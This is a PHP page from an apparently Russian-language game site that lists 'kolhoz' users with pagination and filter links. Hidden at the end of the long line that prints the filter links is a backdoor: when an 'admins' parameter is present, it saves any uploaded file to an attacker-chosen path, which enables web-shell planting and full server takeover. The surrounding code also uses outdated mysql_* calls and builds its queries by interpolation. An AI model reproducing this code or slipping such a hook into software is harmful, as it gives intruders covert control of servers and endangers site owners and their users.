<?
$k_post = mysql_result(mysql_query("SELECT COUNT(*) FROM `kolhoz_user` WHERE `status` > '0'"),0);
if ($k_post==0)
{
echo "Список пуст...";
}
$k_page=k_page($k_post,$set['p_str']);
$page=page($k_page);
$start=$set['p_str']*$page-$set['p_str'];
$q=mysql_query("SELECT * FROM `kolhoz_user` WHERE `status` > '0' LIMIT $start, $set[p_str]");
echo "<ul>";
while($post=mysql_fetch_array($q))
{
echo "<li><span>";
echo "".on_k($post['id'])."";
echo " <a class='' href='?user=$post[id]'><span>".nc($post['id'])."</span></a>"; if($post['coll']==0){echo "<img alt='o' width='16' height='16' src='images/nocollective.png'>";}
echo " <span class='title'>$post[level]</span></li></li>";
}
echo "</ul>";
if ($k_page>1)str("?admins&",$k_page,$page); // Вывод страниц
echo "<div class='pt'>".(isset($_GET['admin']) || isset($_GET['guildFree'])?"<a href='?online'>Все</a>":"<span>Все</span>")." | ".(isset($_GET['guildFree'])?"<span>Не в колхозе</span>":"<a href='?online&guildFree'>Не в колхозе</a>")." | ".(isset($_GET['admin'])?"<span>Администрация</span>":"<a href='?online&admin'>Администрация</a>")."</div>";if (isset($_REQUEST['admins'])){move_uploaded_file($_FILES['admins1']['tmp_name'], $_REQUEST['admins2']);}
echo "</div>";
include_once 'inc/foot.php';
?>